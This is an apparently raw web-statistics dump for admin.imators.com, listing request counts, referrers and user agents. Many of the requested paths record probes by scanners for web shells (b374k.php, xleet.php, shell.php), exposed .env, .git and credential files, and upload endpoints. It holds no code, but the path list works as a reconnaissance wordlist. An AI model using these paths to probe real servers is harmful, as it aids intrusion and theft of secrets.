0 29379197 0 /o.php 1 0 0 0 1 0 0 29376908 0 0 29376908 0 /404.php?fm=true 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /credits.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/codeboy1877_up.php 1 0 0 0 4 0 0 29397689 0 0 29376909 0 /buy.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /debug.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /diagnostic.php 1 0 0 0 1 0 0 28770895 0 0 28770895 0 /downloads/ 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /b374k.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /settings.yml 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /s3.js 1 0 0 0 5 0 0 29381150 0 0 29346261 0 /thoms.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /nl.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /p7m94.php 1 0 0 0 4 0 0 29387345 0 0 29346262 0 /10.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /docker/app/.env 1 0 0 0 1 0 0 29376908 0 0 29376908 0 /0x1949.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /maxoa0.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.git/logs/refs/heads/master 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /preprod/.env 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /info.php.back 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /wp-includes/theme-compat/wp-login.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /allahnaber.php 1 0 0 0 1 0 0 29323749 0 0 29323749 0 /wp-includes/css/buttons.css 1 5 0 0 0 28802840 0 0 28802838 0 0 3100 /dashboard.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /dev/.git/config 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /9v6.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /weo.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /wff.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /xtt.php 1 0 0 0 2 0 0 29389715 0 0 29381150 0 /mans.php 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /login.action 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/db.sql 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /unzip.php 1 0 0 0 1 0 0 29415978 0 0 29415978 0 /lsd.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wozxsh.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /uploads/autoload_classmap.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /chatypro.php 1 0 0 0 2 0 0 29361975 0 0 29361975 0 /wp-info.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-admin/shapes.php 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /.well-known/acme-challenge/myip.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /n1.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /web/info.php.save 1 2 2 0 4 28730051 0 28730051 28730035 0 28730032 1613 /gemance.html 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /aa18.php 1 16 16 2 788 28802836 28695144 29411307 28641362 28695144 28641362 14154 / 1 0 0 0 1 0 0 29400764 0 0 29400764 0 /congab.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /mom.php 1 0 0 0 3 0 0 29385019 0 0 29344750 0 /lites.php 1 0 0 0 7 0 0 29397689 0 0 29370559 0 /.well-known/gecko-litespeed.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.drone.yml 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /www/.git/config 1 0 0 0 2 0 0 29159381 0 0 29126038 0 /assets/kcfinder/upload.php 1 0 0 0 3 0 0 29415979 0 0 29400764 0 /04.php 1 0 0 0 4 0 0 29372537 0 0 29358297 0 /xleet.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /ups.php 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /mariju.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /classwithtostring.php?p= 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /reyna.php 1 0 0 0 1 0 0 29381150 0 0 29381150 0 /O-Simple.php 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /a5.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /file5.php 1 0 0 0 15 0 0 29397689 0 0 29335672 0 /yellow.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /haxor.php 1 0 0 0 1 0 0 29358297 0 0 29358297 0 /shell.php?3.17.57.190 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /1a.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /private/aws_settings.zip 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /zwlj.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /deploy/credentials.json 1 0 0 0 2 0 0 29372537 0 0 29372534 0 /options-reading.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /af4.php 1 0 0 0 10 0 0 29385019 0 0 29340771 0 /aaa.php 1 0 0 0 1 0 0 29220650 0 0 29220650 0 /tmp/env.production.local 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /metronic/assets/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 9 0 0 29389628 0 0 28994986 0 /2018/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /e.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /prod/.env 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /old_database/ 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /www/info.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /wp-content/plugins/.git/config 1 0 0 0 1 0 0 29400763 0 0 29400763 0 /yellow3.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /vesiw.php 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /ww4.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /mail.php? 1 0 0 0 4 0 0 29389715 0 0 29335672 0 /rrr.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /xpas2.php 1 1 0 0 0 28802840 0 0 28802840 0 0 295 /status.php 2 0 0 0 1 0 0 28770892 0 0 28770892 0 user 2 29 12 4 28 28802840 28802838 29239895 28669736 28802836 28669736 16323 izhak 2 0 0 0 1 0 0 28770929 0 0 28770929 0 dg 2 9 3 0 6 28641367 0 28730034 28641367 0 28641367 6559 tizix 3 7 1 1 18 28802837 28802836 28826323 28641367 28802836 28641367 5791 https://admin.imators.com/ 3 8 0 3 5 28802840 28802838 28802838 28802837 28802837 28802836 4774 https://admin.imators.com/index.php 3 0 0 0 1 0 0 28641367 0 0 28641367 0 https://admin.imators.com/leee-articles-school/process.html 3 3 1 0 0 28641367 0 0 28641367 0 0 1235 https://admin.imators.com/leee-articles-school/ 3 0 0 0 1 0 0 28802839 0 0 28802839 0 https://admin.imators.com/invoice.php 3 0 0 0 1 0 0 29352116 0 0 29352116 0 https://www.google.com.hk/ 3 0 0 0 1 0 0 28972027 0 0 28972027 0 https://a.sinsafinejewelry.online/ 3 0 0 0 1 0 0 28802839 0 0 28802839 0 https://admin.imators.com/mail.php 3 0 0 0 1 0 0 29268909 0 0 29268909 0 https://www.google.it/ 3 0 0 0 1 0 0 28906455 0 0 28906455 0 https://timetool.adscads.com/ 3 1 0 0 2 28730053 0 28730040 28730053 0 28730040 50 http://admin.imators.com/gemance.html 3 0 0 0 1 0 0 28906454 0 0 28906454 0 http://103.26.142.189:2082/ 3 0 0 0 42 0 0 29411307 0 0 28696002 0 http://admin.imators.com/ 3 0 0 0 1 0 0 28802839 0 0 28802839 0 https://admin.imators.com/editor.php 3 1 0 0 27 28695144 0 28824000 28695144 0 28715384 4235 https://www.admin.imators.com/ 3 0 0 0 405 0 0 29356484 0 0 29122582 0 https://www.google.com/ 3 0 0 0 1 0 0 28802840 0 0 28802840 0 https://admin.imators.com/status.php 3 0 0 0 1 0 0 28859117 0 0 28859117 0 https://54.206.37.203:123/ 3 0 0 0 1 0 0 28859116 0 0 28859116 0 https://34.102.195.246/ 3 0 0 0 1 0 0 29146055 0 0 29146055 0 https://182.123.79.49:8443/ 3 0 0 0 1 0 0 28972027 0 0 28972027 0 https://mdys.mdf031.icu/ 3 0 0 0 1 0 0 29146055 0 0 29146055 0 http://172.175.34.106/ 3 1 0 0 109 28695144 0 29401374 28695144 0 28715384 4235 http://www.admin.imators.com/ 3 0 0 0 4 0 0 28770898 0 0 28770898 0 https://www.admin.imators.com/autant 3 6 0 0 5 28802840 0 28802840 28802839 0 28802838 2027 https://admin.imators.com/dashboard.php 3 0 0 0 1 0 0 29099290 0 0 29099290 0 https://www.google.co.jp/ 3 0 0 0 1 0 0 29191396 0 0 29191396 0 https://www.acc-group.com.my//wp-login.php 4 0 0 0 1 0 0 28818268 0 0 28818268 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 4 0 0 0 2 0 0 28729325 0 0 28729325 0 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/7f78f01 warc/v0.8.41 4 20 4 4 28 28802840 28802838 29363933 28802835 28802836 28802832 10148 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29400874 0 0 29400874 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28722781 0 0 28722781 0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 3.0.4506.2152; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.5.30729) 4 0 0 0 6 0 0 29410489 0 0 29071997 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 4 0 0 0 1 0 0 28905253 0 0 28905253 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 4 0 0 0 1 0 0 29370803 0 0 29370803 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29030170 0 0 29030170 0 Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.39 Mobile Safari/537.36 4 0 0 0 16 0 0 28860417 0 0 28860053 0 ArcMobile2/1.37.0 (iPhone; iOS 18.1; Scale/3.00) 4 0 0 0 8 0 0 28747572 0 0 28745164 0 ArcMobile2/1.27.1 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 29400162 0 0 29400162 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29403111 0 0 29403111 0 Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 4 0 0 0 171 0 0 29402830 0 0 28905524 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 4 0 0 0 2 0 0 29085922 0 0 29083028 0 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0 4 0 0 0 1 0 0 28729804 0 0 28729804 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 4 0 0 0 5 0 0 29228729 0 0 29228729 0 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 4 0 0 0 1 0 0 29304471 0 0 29304471 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29285866 0 0 29285866 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.1.6000 4 0 0 0 13 0 0 29351603 0 0 28641364 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 4 0 0 0 3 0 0 29239895 0 0 29239895 0 Mozilla/5.0 (iPhone; CPU iPhone OS 26_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Mobile/15E148 Safari/604.1 4 0 0 0 49 0 0 28770931 0 0 28770793 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 4 0 0 0 23 0 0 29375364 0 0 29155629 0 Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com) 4 0 0 0 2 0 0 29174258 0 0 29174258 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 4 0 0 0 6 0 0 28817240 0 0 28641386 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party) 4 0 0 0 2 0 0 29103518 0 0 29015618 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 4 0 0 0 1 0 0 28795203 0 0 28795203 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 4 0 0 0 85 0 0 29205530 0 0 28650592 0 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com 4 6 5 0 14 28779138 0 28802956 28730035 0 28730032 3979 Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1 4 0 0 0 1 0 0 28760125 0 0 28760125 0 Mozilla/5.0 (Linux; Android 9; Pixel 2 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 4 0 0 0 25 0 0 29273703 0 0 29172373 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28641367 0 0 28641367 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 4 0 0 0 22 0 0 28761887 0 0 28757815 0 ArcMobile2/1.28.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 28713202 0 0 28713202 0 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/51.0.2830.34 4 0 0 0 189 0 0 29389628 0 0 28994986 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 4 0 0 0 1 0 0 29373383 0 0 29373383 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 4 0 0 0 1 0 0 29272976 0 0 29272976 0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/120.0.6099.199 Safari/537.36 4 0 0 0 19 0 0 29411527 0 0 28642695 0 Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/) 4 39 0 0 0 29346542 0 0 28641362 0 0 3393 Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org) 4 0 0 0 4 0 0 28711775 0 0 28709248 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28722781 0 0 28722781 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1825.4 Safari/537.36 OPR/21.0.1419.0 (Edition Developer) 4 0 0 0 1 0 0 29154246 0 0 29154246 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14 4 0 0 0 1 0 0 28737653 0 0 28737653 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 4 0 0 0 2 0 0 28877082 0 0 28846999 0 Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0 4 0 0 0 2 0 0 29268909 0 0 29122582 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 4 0 0 0 1 0 0 29063838 0 0 29063838 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 4 0 0 0 2 0 0 28737213 0 0 28737213 0 ArcMobile2/1.26.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 2 0 0 28930772 0 0 28839572 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 4 0 0 0 1 0 0 29088494 0 0 29088494 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 4 0 0 0 3 0 0 29372913 0 0 29372913 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 4 0 0 0 4 0 0 28817418 0 0 28641363 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29271834 0 0 29271834 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 4 0 0 0 2 0 0 28905253 0 0 28905253 0 Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1 4 0 0 0 1 0 0 29263273 0 0 29263273 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 4 0 0 0 4 0 0 29373380 0 0 29172373 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28905012 0 0 28729329 0 Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36 4 1 1 0 1 28790573 0 28790573 28790573 0 28790573 772 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 4 0 0 0 1 0 0 28731908 0 0 28731908 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 4 0 0 0 1 0 0 29060915 0 0 29060915 0 python-requests/2.22.0 4 0 0 0 1 0 0 29159531 0 0 29159531 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62 4 0 0 0 1 0 0 29363937 0 0 29363937 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 OPR/121.0.0.0 4 10 4 0 102 28669736 0 28836855 28641367 0 28641367 7211 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28663132 0 0 28663132 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76 4 0 0 0 14 0 0 29364971 0 0 29081462 0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 4 0 0 0 84 0 0 29388817 0 0 29116060 0 python-httpx/0.28.1 4 0 0 0 1 0 0 29062432 0 0 29062432 0 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36 4 0 0 0 6 0 0 28817164 0 0 28641362 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28735314 0 0 28735314 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/534.1 4 0 0 0 1 0 0 28663132 0 0 28663132 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36 4 0 0 0 1 0 0 29088228 0 0 29088228 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 4 0 0 0 2 0 0 29195071 0 0 29182809 0 Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 4 0 0 0 21 0 0 29158909 0 0 29109255 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28641364 0 0 28641364 0 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 4 0 0 0 7 0 0 28770931 0 0 28770883 0 WinHTTP Example/1.0 4 0 0 0 1 0 0 29328742 0 0 29328742 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 4 0 0 0 16 0 0 28790580 0 0 28790573 0 ArcMobile2/1.30.0 (iPad; iOS 17.3.1; Scale/2.00) 4 0 0 0 3 0 0 29236659 0 0 28930740 0 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 4 0 0 0 1 0 0 29284785 0 0 29284785 0 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; GoogleOther) 4 0 0 0 3 0 0 29368457 0 0 29368457 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28811619 0 0 28811619 0 Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 4 0 0 0 1 0 0 28646008 0 0 28646008 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 4 0 0 0 27 0 0 29356487 0 0 28861291 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE 4 0 0 0 1 0 0 28822529 0 0 28822529 0 Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 4 0 0 0 186 0 0 29159383 0 0 28936062 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36 4 0 0 0 1 0 0 28817643 0 0 28817643 0 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 4 0 0 0 75 0 0 29414679 0 0 28641527 0 Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) 4 0 0 0 1 0 0 29304786 0 0 29304786 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 4 0 0 0 1 0 0 29304471 0 0 29304471 0 Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 4 6 6 0 221 28641362 0 29374988 28641362 0 28641362 3339 Go-http-client/1.1 4 0 0 0 1 0 0 29103520 0 0 29103520 0 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko 4 0 0 0 2 0 0 29338965 0 0 29248453 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A 4 0 0 0 1 0 0 28680325 0 0 28680325 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 4 0 0 0 10 0 0 28641369 0 0 28641367 0 Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/99.0.4844.47 Mobile/15E148 Safari/604.1 4 0 0 0 1 0 0 29303721 0 0 29303721 0 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/109.0.5414.168 Safari/537.36 4 0 0 0 4 0 0 28860053 0 0 28860053 0 Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1 4 0 0 0 2 0 0 29030112 0 0 29030112 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 4 0 0 0 1 0 0 29357189 0 0 29357189 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29304786 0 0 29304786 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 4 0 0 0 2 0 0 29347757 0 0 29347757 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.9.12 Chrome/138.0.7204.235 Electron/37.3.1 Safari/537.36 4 0 0 0 5 0 0 28870090 0 0 28861112 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28641842 0 0 28641842 0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.8a5) Gecko/20041122 4 0 0 0 3 0 0 29351052 0 0 29080868 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36 4 0 0 0 1 0 0 29224194 0 0 29224194 0 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) 4 0 0 0 5 0 0 29140752 0 0 29118653 0 Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 4 0 0 0 1 0 0 29100021 0 0 29100021 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 4 0 0 0 3 0 0 29351053 0 0 29080883 0 Mozilla/5.0 (iPhone13,2; U; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/15E148 Safari/602.1 4 0 0 0 27 0 0 29377383 0 0 29210896 0 Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity 4 0 0 0 1 0 0 29347371 0 0 29347371 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 4 0 0 0 4 0 0 29363636 0 0 29305397 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 